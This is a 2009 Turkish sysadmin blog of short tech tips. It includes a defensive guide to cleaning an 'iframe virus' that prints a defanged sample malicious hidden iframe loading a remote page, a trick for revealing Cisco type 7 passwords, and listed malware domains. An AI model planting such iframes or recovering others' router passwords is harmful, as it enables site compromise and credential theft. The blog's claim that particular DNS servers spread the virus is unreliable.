Vedat FETAH Kimdir?

Ege Üniversitesi Bilgi İşlem Daire Başkanlığı bünyesinde kampüs güvenlik sistemleri yöneticisi olarak çalışma hayatıma devam ediyorum. Günlük yaşamda teknoloji ağırlıklı karşılaştığım ve beğendiğim yazıları paylaşmak amacıyla bu bloğu oluşturdum. Umarım birilerinin bilgilenmesini sağlar.

Halen Çalışmakta Olduğum Yer

Halen Ege Üniversitesi Uluslararası Bilgisayar Enstitüsü Binasında Bilgi İşlem Daire Başkanlığın'da çalışmaya devam etmekteyim.

3 Ekim 2009 Cumartesi

Windows Live Messenger Bağlanamama Hatası!


Msn açılış sırasında "AppName: wlcomm.exe AppVer: 14.0.8064.206 ModName: ntdll.dll" şeklinde bir hata veriyorsa çözümü çok basittir: Programlar => Windows live => Contacts (C:\Program Files\Windows Live\Contacts) klasörünün içindeki wlcomm.exe adlı dosyanın özelliklerinden uyumluluk modunu windows 95'e ayarlayıp, görüntü ayarlarından görsel temaları devre dışı bırak seçeneği işaretlenerek programın normal bir biçimde açılması sağlanabilir.

15 Eylül 2009 Salı

Debian Sunucuda 64 GB. 'a KAdar RAM Tanıtma!

Son zamanlarda çalışan sunucuların çoğu 3 GB. üzerinde RAM kullanmaktadır. Bunun sonucunda 32 bit işletim sistemi kurulumlarında RAM kullanamama sorunu ortaya çıkmaktadır. Bu sorunu çözebilmek için Debian sunucularda apt-get install linux-image-2.6-686-bigmem komutunu girmeniz yeterli. Bu işlem sonucunda sunucunuzun RAM desteği 64 Gb.'a kadar çıkartılabilecektir.

Ayrıca cache RAM temizlemek için girilmesi gereken komutlar:

# sync
# echo 3 > /proc/sys/vm/drop_caches
Eğer crona yazıp her 10 dakika da bir çalıştırmasını istiyorsanız :

# crontab -e
*/10 * * * * /bin/sync
*/10 * * * * /bin/echo 3 > /proc/sys/vm/drop_caches
satırlarını crontaba eklemeniz yeterli olur.

Apache Server Status


Apache kullanıyorsanız ve bazen sunucunun durumu hakkında bilgiye ihtiyaç duyuyorsanız aşağıda bahsedeceğim yolu izleyerek bunu yapabilirsiniz.

Öncelikle anlatılanlar apache2 içindir.

Sunucuya SSH ile bağlandığınızda ;
cd /etc/apache2/sites-enabled/
nano 000-default
komutlarını giriniz. Daha sonra karşınıza çıkan içeriğin en altına tanımının üstüne şu satırları ekleyiniz:

SetHandler server-status
Allow from 155.223.22.22
Deny from All


Bütün bu işlemler bittikten sonra
/etc/init.d/apache2 restart komutunu işleterek web sunucunun restart edilmesini sağlıyoruz. Son olarak durumu izleyeceğimiz yöntem:
Bir web browser'ında http://sunucunuzunadresi.net/durumgoster?refresh=2 adresini yazarak bilgileri izleyebilirsiniz.

refresh=2 değeri kaç saniyede bir durum bilgilerinin yenileneceğini gösterir.

Veya daha detaylı bilgi almak isterseniz Debian dağıtımlarda otomatik kurulumu mümkün olan bir php scripti bulunur.

apt-get install phpsysinfo komutunu işleterek sisteminize kurun ve daha sonra
http://sunucunuzun adresi/phpsysinfo adresine girip sisteminiz hakkında detaylı bilgi sahibi olun.

7 Eylül 2009 Pazartesi

Bir araç kullanmadan Cisco type 7 şifresini görmek


Cisco tech newsletter daki ipuçlarından birine göre "keychain" konfigürasyonundaki bir Cisco router'da Type 7 şifreleri görmek (kırmak) mümkün:

Router (config) #key chain LIGHT
Router (config-keychain) #key 718
Router (config-keychain-key) #key-string 7 11192616193C233850012E3D2B2725711D
Router (config-keychain-key) #do show key chain LIGHT Key-chain decrypt:

key 1 -- text "decrypted_password"

accept lifetime (always valid) - (always valid) [valid now]
send lifetime (always valid) - (always valid) [valid now]

Güzel bir ipucu ama yine de daha önce bu blogda yazmış olduğumuz kazmier.com daki aracı kullanmak daha hızlı ve kolay:

http://www.kazmier.com/computer/cisco-apps.html

3 Eylül 2009 Perşembe

IFrame Virüsü Hakkında Bilgilendirme...


En son olarak izmirpolis sitesinin başına gelen olaya sebep olan şey bir virüsten ibarettir. Bu virüsün adı iframe virüsüdür. Kısaca virüsün çalışma şeklini ve nasıl temizleme yapılacağını anlatmaya çalışacağım. Bu iş için öncelikle bir adet programcığa ihtiyacınız var. Google'da Advanced Find and Replace yazarak aratıp edinebilirsiniz bu programcığı.

Bu virüsün yayılıp zarar vermesine sebep olan 3 yol vardır:

1- Null script kullanımı
2- Null program kullanımı
3- Justin TV ve Youtube izleme için kullanılan Dns'ler başı çekiyor.

Aşağıda vereceğim iki Dns özellikle bu virüsün yayılmasında en etkili dnslerdir.
212.58.3.2
212.58.4.2

Yukarıda verdiğim DNS'leri kullanmanız durumda oluşacak zarar şu şekilde gözlemlenir:
1- Virüs önce sisteminizi ele geçirir.
2- Kayıtlı FTP programındaki site şifreleri ile sisteminize giriş için anahtarı eline alır.
3- Tasarımı yapılan site dosyalarının içeriğini değiştirir.

Hangi dosyaların içerikleri nasıl değiştirilir?

index.php (asp)
main.php (asp)
header.php (asp)
Footer.php (asp)
index.html (htp)
admin.php (asp)

İçeriklerine IFrame ekleyerek google'ın sitenizi zararlı site kategorisine sokmasını sağlar.

Nasıl temizleriz?

1- Öncelikle FTP sitelerinizin şifrelerini değiştirmeniz gerekmektedir. Bu şifreleri hiçbir programın kaydetmediğinden emin olmalısınız.
2- Kendi bilgisayarımıza adam gibi bir antivirüs kuruyoruz. Tercihen Kaspersky Antivirüs ile sisteminizi taratınız. Muhtemelen 10'dan az olmayacak sayıda solucan ve türevleri bu virüs sayesinde sisteminize sızmıştır. Bunların temizlendiğinden kesin emin olun.
3- Bilgisayarınızın masaüstüne bir klasör oluşturun ve ftp sitenizin içeriğini bu klasöre kopyalayın.
4- Yukarıda daha önce belirttiğim programcığı (Advanced Find and Replace) çalıştırın ve browse yazan yere masaüstünde bulunan web içeriğinizin olduğu dizini gösterin.
5- Search Query kısmına 'iframe' yazıp Execute butonuna tıklayın. IFrame içeriklerini dikkatlice kontrol edip zararlı istekleri temizledikten sonra FTP sitenize tekrar yüklemeniz gerekmektedir.
6- FTP programı ile yüklemenizi yaptıktan sonra virüsün zarar verebileceği dosyalarınızın izinlerini chmod 444 olarak değiştirin. Son olarak FTP şifrenizi değiştirmenizde fayda var.
7- Son aşama ise sitenizin güvenilir olduğunu Google amcaya belirtme kısmıdır. Bu iş için http://www.google.com.tr/webmastertools adresini ziyaret edip sitenizin temiz olduğunu Google amcaya blirtmelisiniz. Takip eden 2 hafta içerisinde muhtemelen siteniz eski sağlığına kavuşacaktır :)
Örnek zararlı kod:

< i_ f r a m e src='http://x.x.x.x/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0
FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no>

Dipnot: Yukarıdaki kodda iframe kelimesini ve ip adresini değiştirmek zorunda kaldım.
Bu sorunu engellemenin en kısa yolu windows kullanmayı bırakmaktır :)

19 Ağustos 2009 Çarşamba

İzmir Polis Zararlı İçerik Nedeniyle Engelleniyor!


Bugün http://www.izmirpolis.gov.tr adresini ziyaret etmeye çalıştığımızda karşımıza çıkan manzara aynen yanda bulunan resimdeki gibiydi. Bu olaya sebep olan şeyin özeti ise yorumsuz olarak aşağıda Google tarafından belirtildiği şekildedir.

Google bu siteyi ziyaret ettiğinde ne oldu?

Geçtiğimiz 90 gün içinde bu sitede test ettiğimiz 27 sayfadan 14 sayfanın, kullanıcının rızası olmadan kötü amaçlı yazılım indirilmesine ve yüklenmesine neden olduğu saptanmıştır. Google, bu siteyi en son 2009-08-15 tarihinde ziyaret etmiş ve bu sitede en son 2009-08-15 tarihinde şüpheli içerik bulunmuştur.

Malicious software includes 2 trojan(s), 1 scripting exploit(s).

Kötü amaçlı yazılım x9o.ru/, xb8.ru/, x9w.ru/ alan adları da dahil 4 alanda barındırılıyor.

This site was hosted on 1 network(s) including AS9121 (TTNET).

Bu site, kötü amaçlı yazılımın dağıtılmasına aracılık yapmaya devam ediyor mu?

90 günü aşkın süredir, izmirpolis.gov.tr sitesinin hiçbir siteye kötü amaçlı yazılım bulaştırılmasına aracılık ettiği saptanmamıştır.

Bu sitede kötü amaçlı yazılım barındırılıyor mu?

Hayır, bu site 90 günü aşkın bir süredir kötü amaçlı yazılım barındırmamaktadır.

Bu nasıl oldu?

Bazı durumlarda üçüncü taraflar yasal sitelere kötü amaçlı kod ekleyebilir, bu da bizim uyarı mesajı göstermemize yol açar.

Bilgi kaynağı: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=tr&site=http://www.izmirpolis.gov.tr/

17 Ağustos 2009 Pazartesi

Migros Jet Kasa


Tatil dönüşü alış-veriş için gittiğim Migrosta karşılaştığım olay beni şaşırttı. Jet kasa adında yeni bir sisteme geçiş yapılıyor. Nedir jet kasa? 3 adımda hızlı ödeme sistemi. Kasa görevlisi olmadan aldığınız ürünlerin barkodunu kendiniz okutup yandaki poşetlere dolduruyorsunuz ve sonra ödeme şeklinizi seçip (kredi kartı yada debit gibi kartlı seçenekler var şu an sadece) fişinizi aldıktan sonra çıkıp gidiyorsunuz. Acayip hoşuma gitti bu sistem ama kasa görevlilerinin pek hoşuna gitmeyecek gibi.

JET KASA Hizmeti Bulunan Mağazalar:

  • MMM Ataşehir Mağazası / İstanbul
  • MM Capitol Mağazası / İstanbul
  • MMM Caddebostan Mağazası / İstanbul
  • MM Çeşme Mağazası / İzmir
  • MM Didim Mağazası / Aydın
  • M Davutlar Mağazası / Aydın
  • MMM Bahçeşehir Mağazası / İstanbul
  • MM Bornova 2 Mağazası / İzmir
  • MMM Cevahir Mağazası / İstanbul


Kısa tanıtım filmini izlemek için: http://www.migros.com.tr/flash/content_swf/jetkasa_anim.swf

Toshiba Portege 3G Ayarı


Eğer sizde benim gibi Toshiba Portege G810 kullanıcısı iseniz ve 3G sistemine kayıt edilmenize rağmen 3G sembolünü göremediyseniz bir çözüm var. Bu sorunu gidermek için öncelikle telefonunuzun Ayarlar bölümünden Bağlantılar sekmesine tıklıyoruz. Daha sonra Network Mode bölümünden Select Network Mode kısmını Auto, Select GSM/UMTS band kısmını ise GSM(900+1800) UMTS(2100) seçerek sorunu çözmüş oluyorsunuz. Bu arada İkinci kısmı asla Auto bırakmayın sorunun tek kaynağı orasının manuel olarak seçilmemesidir.

31 Temmuz 2009 Cuma

ISC BIND 9 Remote Dynamic Update Message Sorunu


Bind9 sürümünü kullanan herkesin dikkat etmesi gereken bir açık çıkmıştır. Bu açık sayesinde bind servisi uzaktan yetkisiz girişimle durdurulabilmektedir (bizzat tarafımdan denenmiştir). Eğer Bind9 sürümünü güncellemezseniz dns'iniz çalışmaz hale getirilebilir. Eğer bind9 sürümünüzü hemen güncelleyemeyecekseniz aşağıdaki iptables betiğini çalıştırmanız geçici bir çözüm sağlayacaktır.

Betik: iptables -A INPUT -p udp --dport 53 -j DROP -m u32 --u32 '30>>27&0xF=5'

SysAdminDay


Bütün sistem yöneticilerinin, her yıl Temmuz ayının son Cuma günü düzenlenen ve bu yıl 10. yılı olan SysAdminDay'i kutlu olsun. Umarım birgün birileri elle tutulup gözle görülemeyen bilgilerin işlenmesin sürecini düzenleyen sistemcileri takdir eder.

Paylaş

Twitter Delicious Facebook Digg Stumbleupon Favorites